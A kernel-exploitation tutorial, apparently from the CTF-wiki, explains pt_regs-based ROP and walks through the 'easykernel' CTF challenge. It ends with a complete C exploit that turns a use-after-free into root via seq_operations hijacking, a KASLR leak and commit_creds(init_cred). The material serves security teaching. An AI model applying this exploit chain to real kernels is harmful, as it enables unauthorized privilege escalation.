Using pt_regs to Construct Universal Kernel ROP¶

System Calls and the pt_regs Structure¶

What is the essence of a system call? Many people can answer that it involves setting up the appropriate parameters in user mode and then executing the syscall assembly instruction, entering the kernel's entry_SYSCALL_64 function through a gate structure, and then jumping to the corresponding function via the system call table.

Now let's look inside the entry_SYSCALL_64 function, which is written in assembly. Note that when the program enters kernel mode, this function pushes all registers onto the kernel stack, forming a pt_regs structure. This structure is essentially located at the bottom of the kernel stack, and is defined as follows:

struct pt_regs {
/*
 * C ABI says these regs are callee-preserved. They aren't saved on kernel entry
 * unless syscall needs a complete, fully filled "struct pt_regs".
 */
    unsigned long r15;
    unsigned long r14;
    unsigned long r13;
    unsigned long r12;
    unsigned long rbp;
    unsigned long rbx;
/* These regs are callee-clobbered. Always saved on kernel entry. */
    unsigned long r11;
    unsigned long r10;
    unsigned long r9;
    unsigned long r8;
    unsigned long rax;
    unsigned long rcx;
    unsigned long rdx;
    unsigned long rsi;
    unsigned long rdi;
/*
 * On syscall entry, this is syscall#. On CPU exception, this is error code.
 * On hw interrupt, it's IRQ number:
 */
    unsigned long orig_rax;
/* Return frame for iretq */
    unsigned long rip;
    unsigned long cs;
    unsigned long eflags;
    unsigned long rsp;
    unsigned long ss;
/* top of stack page */
};

Kernel Stack and Universal ROP¶

As we all know, the kernel stack is only one page in size, and the pt_regs structure is fixed at the bottom of the kernel stack. When we hijack a function pointer in a kernel structure (e.g., seq_operations->start), the relative offset between rsp and the stack bottom is usually constant when we hijack the kernel execution flow through that function pointer.

In a system call, many registers are not necessarily used, such as r8 ~ r15. These registers provide the possibility for us to place a ROP chain, and we can easily think of:

We only need to find a gadget of the form "add rsp, val ; ret" to complete the ROP

Here the author provides a universal ROP template for convenient debugging and observation:

asm volatile(
    "mov r15,   0xbeefdead;"
    "mov r14,   0x11111111;"
    "mov r13,   0x22222222;"
    "mov r12,   0x33333333;"
    "mov rbp,   0x44444444;"
    "mov rbx,   0x55555555;"
    "mov r11,   0x66666666;"
    "mov r10,   0x77777777;"
    "mov r9,    0x88888888;"
    "mov r8,    0x99999999;"
    "xor rax,   rax;"
    "mov rcx,   0xaaaaaaaa;"
    "mov rdx,   8;"
    "mov rsi,   rsp;"
    "mov rdi,   seq_fd;"  // here we assume triggering through seq_operations->start
    "syscall"
);

Newer Kernel Countermeasures Against pt_regs-based Attacks¶

As the saying goes, for every measure there is a countermeasure. The kernel mainline added a random offset to the system call stack in this commit, which means the offset between pt_regs and the stack at the point where we hijack the kernel execution flow is no longer a fixed value:

diff --git a/arch/x86/entry/common.c b/arch/x86/entry/common.c
index 4efd39aacb9f2..7b2542b13ebd9 100644
--- a/arch/x86/entry/common.c
+++ b/arch/x86/entry/common.c
@@ -38,6 +38,7 @@
 #ifdef CONFIG_X86_64
 __visible noinstr void do_syscall_64(unsigned long nr, struct pt_regs *regs)
 {
+    add_random_kstack_offset();
     nr = syscall_enter_from_user_mode(regs, nr);

     instrumentation_begin();

Of course, if the random offset value is small and we still have enough usable registers, we can still use some slide gadgets to continue the exploitation, although the stability is significantly reduced.

Example: West Lake Sword 2021 Online Qualifier - easykernel¶

The challenge files can be downloaded from https://github.com/ctf-wiki/ctf-challenges/tree/master/pwn/linux/kernel-mode/XHLJ2021-easykernel.

Analysis¶

First, examining the startup script, we can see that SMEP and KASLR are enabled:

#!/bin/sh

qemu-system-x86_64  \
-m 64M \
-cpu kvm64,+smep \
-kernel ./bzImage \
-initrd rootfs.img \
-nographic \
-s \
-append "console=ttyS0 kaslr quiet noapic"

Entering the challenge environment and checking /sys/devices/system/cpu/vulnerabilities/*, we can see that PTI (page table isolation) is enabled:

/ $ cat /sys/devices/system/cpu/vulnerabilities/*
KVM: Mitigation: VMX unsupported
Mitigation: PTE Inversion
Vulnerable: Clear CPU buffers attempted, no microcode; SMT Host state unknown
Mitigation: PTI
Vulnerable
Mitigation: usercopy/swapgs barriers and __user pointer sanitization
Mitigation: Full generic retpoline, STIBP: disabled, RSB filling
Not affected
Not affected

The challenge provides a test.ko file. Loading it into IDA for analysis, we find that only ioctl is defined. We can see that this is a common "menu heap" challenge, providing functionality to allocate, free, read, and write objects. For allocating an object, we need to pass in a structure of the following form:

struct
{
    size_t size;
    void *buf;
}

For freeing, reading, and writing objects, we need to pass in a structure of the following form:

struct 
{
    size_t idx;
    size_t size;
    void *buf;
};

Allocation: 0x20¶

A fairly standard kmalloc with no size limit. A maximum of 0x20 chunks can be allocated:

 v7 = _kmalloc(v12, 3264LL);
  v8 = v7;
  if ( !v7 )
    return 0LL;
  v9 = v12;
  v10 = v13;
  if ( v12 > 0x7FFFFFFF )
    goto LABEL_29;
  _check_object_size(v7, v12, 0LL);
  v11 = copy_from_user(v8, v10, v9);
  if ( v11 )
    return 0LL;
  while ( addrList[v11] )
  {
    if ( ++v11 == 32 )
      return 0LL;
  }
  addrList[(int)v11] = v8;
  return 0LL;
}

Free: 0x30¶

The pointer is not cleared after kfree, giving us a blatant UAF vulnerability right away:

  if ( a2 != 32 )
  {
    if ( a2 != 48 )
      return result;
    if ( !copy_from_user(&v12, v2, 8LL) )
    {
      if ( (unsigned int)v12 <= 0x20 )
      {
        if ( addrList[(unsigned int)v12] )
          kfree();
      }
      return 0LL;
    }
    return -22LL;
  }

Read: 0x40¶

Calls the show function:

  if ( a2 == 64 )
  {
    if ( !copy_from_user(&v12, v2, 24LL) )
    {
      show(&v12);
      return 0LL;
    }
    return -22LL;
  }

It is essentially a wrapped version of reading object content, with a hardened usercopy check added:

__int64 __fastcall show(_QWORD *a1)
{
  const void *v1; // rsi
  unsigned __int64 v2; // r13
  __int64 v3; // r14
  _QWORD v5[37]; // [rsp-128h] [rbp-128h] BYREF

  _fentry__();
  v5[32] = __readgsqword(0x28u);
  v5[0] = 0LL;
  memset(&v5[1], 0, 0xF8uLL);
  if ( (unsigned int)*a1 > 0x20 )
    return 0xFFFFFFFFLL;
  v1 = (const void *)addrList[(unsigned int)*a1];
  if ( !v1 )
    return 0xFFFFFFFFLL;
  v2 = a1[1];
  v3 = a1[2];
  qmemcpy(v5, v1, 0x100uLL);
  if ( v2 > 0x100 )
  {
    _warn_printk("Buffer overflow detected (%d < %lu)!\n", 256LL, v2);
    BUG();
  }
  _check_object_size(v5, v2, 1LL);
  return copy_to_user(v3, v5, v2) != 0 ? 0xFFFFFFEA : 0;
}

Write: 0x50¶

Standard object write:

  if ( a2 > 0x40 )
  {
    if ( a2 == 80 )
    {
      if ( copy_from_user(&v12, v2, 24LL) )
        return -22LL;
      if ( (unsigned int)v12 <= 0x20 )
      {
        v4 = addrList[(unsigned int)v12];
        if ( v4 )
        {
          v5 = v13;
          v6 = v14;
          if ( v13 <= 0x7FFFFFFF )
          {
            _check_object_size(addrList[(unsigned int)v12], v13, 0LL);
            copy_from_user(v4, v6, v5);
            return 0LL;
          }
LABEL_29:
          BUG();
        }
      }
    }
    return 0LL;
  }

Solution: UAF + seq_operations + pt_regs + ROP¶

Since we have a direct UAF vulnerability with no size limit, there are many possible solutions. Let's first consider how to hijack the kernel execution flow. We can easily think of various dynamically allocated function tables. For example, the seq_operations structure is dynamically allocated from kmalloc-32:

When we open a stat file (e.g., /proc/self/stat), a seq_operations structure is allocated in kernel space. This structure is defined in /include/linux/seq_file.h and only defines four function pointers, as follows:

struct seq_operations {
    void * (*start) (struct seq_file *m, loff_t *pos);
    void (*stop) (struct seq_file *m, void *v);
    void * (*next) (struct seq_file *m, void *v, loff_t *pos);
    int (*show) (struct seq_file *m, void *v);
};

When we read a stat file, the kernel calls its proc_ops' proc_read_iter pointer, whose default value is the seq_read_iter() function, defined in fs/seq_file.c. Note the following logic:

ssize_t seq_read_iter(struct kiocb *iocb, struct iov_iter *iter)
{
    struct seq_file *m = iocb->ki_filp->private_data;
    //...
    p = m->op->start(m, &m->index);
    //...

That is, it calls the start function pointer in seq_operations. So we only need to control seq_operations->start and then read the corresponding stat file to control the kernel execution flow.

After controlling the kernel execution flow, let's see how to further perform privilege escalation. We can easily think of placing a ROP chain on pt_regs and then using a gadget of the form add rsp; ret to complete the ROP. Note that KPTI is enabled, so we need to use the swapgs_restore_regs_and_return_to_usermode function to return to user mode at the end.

The final exploit is as follows:

/**
 * Copyright (c) 2021 arttnba3 <arttnba@gmail.com>
 * 
 * This work is licensed under the terms of the GNU GPL, version 2 or later.
**/

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <stddef.h>
#include <unistd.h>
#include <sys/ioctl.h>

/**
 * Kernel Pwn Infrastructures
**/

#define SUCCESS_MSG(msg)    "\033[32m\033[1m" msg "\033[0m"
#define INFO_MSG(msg)       "\033[34m\033[1m" msg "\033[0m"
#define ERROR_MSG(msg)      "\033[31m\033[1m" msg "\033[0m"

#define log_success(msg)    puts(SUCCESS_MSG(msg))
#define log_info(msg)       puts(INFO_MSG(msg))
#define log_error(msg)      puts(ERROR_MSG(msg))

void err_exit(char *msg)
{
    printf(ERROR_MSG("[x] Error at: ") "%s\n", msg);
    sleep(5);
    exit(EXIT_FAILURE);
}

size_t swapgs_restore_regs_and_return_to_usermode;
size_t init_cred;
size_t pop_rdi_ret;
size_t kernel_base = 0xffffffff81000000, kernel_offset = 0;
size_t commit_creds;
size_t gadget;

void get_root_shell(void)
{
    if(getuid()) {
        log_error("[x] Failed to get the root!");
        sleep(5);
        exit(EXIT_FAILURE);
    }

    log_success("[+] Successful to get the root.");
    log_info("[*] Execve root shell now...");

    system("/bin/sh");

    /* to exit the process normally, instead of potential segmentation fault */
    exit(EXIT_SUCCESS);
}

/**
 * Challenge Interface
**/

struct chal_karg_type1 {
    size_t  idx;
    size_t  size;
    void    *buf;
};

struct chal_karg_type2 {
    size_t  size;
    void    *buf;
};

void alloc_chunk(long dev_fd, size_t size, void *buf)
{
    struct chal_karg_type2 arg = {
        .size = size,
        .buf = buf,
    };
    ioctl(dev_fd, 0x20, &arg);
}

void delete_chunk(long dev_fd, size_t idx)
{
    struct chal_karg_type1 arg = {
        .idx = idx,
    };
    ioctl(dev_fd, 0x30, &arg);
}

void read_chunk(long dev_fd, size_t idx, size_t size, void *buf)
{
    struct chal_karg_type1 arg = {
        .idx = idx,
        .size = size,
        .buf = buf,
    };
    ioctl(dev_fd, 0x40, &arg);
}

void write_chunk(long dev_fd, size_t idx, size_t size, void *buf)
{
    struct chal_karg_type1 arg = {
        .idx = idx,
        .size = size,
        .buf = buf,
    };
    ioctl(dev_fd, 0x50, &arg);
}

/**
 * Exploitation
**/

#define COMMIT_CREDS 0xffffffff810c8d40
#define SEQ_OPS_0 0xffffffff81319d30
#define INIT_CRED 0xffffffff82663300
#define POP_RDI_RET 0xffffffff81089250
#define SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE 0xffffffff81c00f30

size_t buf[0x100];
int seq_fd;

void exploitation(void)
{
    int dev_fd;

    dev_fd = open("/dev/kerpwn", O_RDWR);
    if (dev_fd < 0) {
        err_exit("FAILED to open the /dev/rwctf file!");
    }

    puts(INFO_MSG("[*] Allocating object and UAF as seq_operations..."));
    alloc_chunk(dev_fd, 0x20, buf);
    delete_chunk(dev_fd, 0);
    seq_fd = open("/proc/self/stat", O_RDONLY);
    read_chunk(dev_fd, 0, 0x20, buf);

    kernel_offset = buf[0] - SEQ_OPS_0;
    kernel_base += kernel_offset;
    swapgs_restore_regs_and_return_to_usermode = SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE + kernel_offset;
    init_cred = INIT_CRED + kernel_offset;
    pop_rdi_ret = POP_RDI_RET + kernel_offset;
    commit_creds = COMMIT_CREDS + kernel_offset;
    gadget = 0xffffffff8135b0f6 + kernel_offset;

    printf(
        SUCCESS_MSG("[+] Got kernel base: ") "%lx"
        SUCCESS_MSG(" , kaslr offset: ") "%lx\n",
        kernel_base,
        kernel_offset
    );

    buf[0] = gadget; // seq_operations->stat
    swapgs_restore_regs_and_return_to_usermode += 9;
    write_chunk(dev_fd, 0, 0x20, buf);

    puts(INFO_MSG("[*] Triggering evil seq_operations..."));

    asm volatile(
        "mov r15, 0xbeefdead;" // ROP
        "mov r14, pop_rdi_ret;"
        "mov r13, init_cred;" // add rsp, 0x40 ; ret
        "mov r12, commit_creds;"
        "mov rbp, swapgs_restore_regs_and_return_to_usermode;" // iret(q)
        "mov rbx, 0x999999999;"
        "mov r11, 0x114514;"
        "mov r10, 0x666666666;"
        "mov r9, 0x1919114514;"
        "mov r8, 0xabcd1919810;"
        "xor rax, rax;"
        "mov rcx, 0x666666;"
        "mov rdx, 8;"
        "mov rsi, rsp;"
        "mov rdi, seq_fd;"
        "syscall"
    );

    get_root_shell();
}

int main(int argc, char ** argv, char ** envp)
{
    exploitation();
    return 0;
}

Reference¶

https://arttnba3.cn/2021/03/03/PWN-0X00-LINUX-KERNEL-PWN-PART-I/

https://arttnba3.cn/2021/11/29/PWN-0X02-LINUX-KERNEL-PWN-PART-II/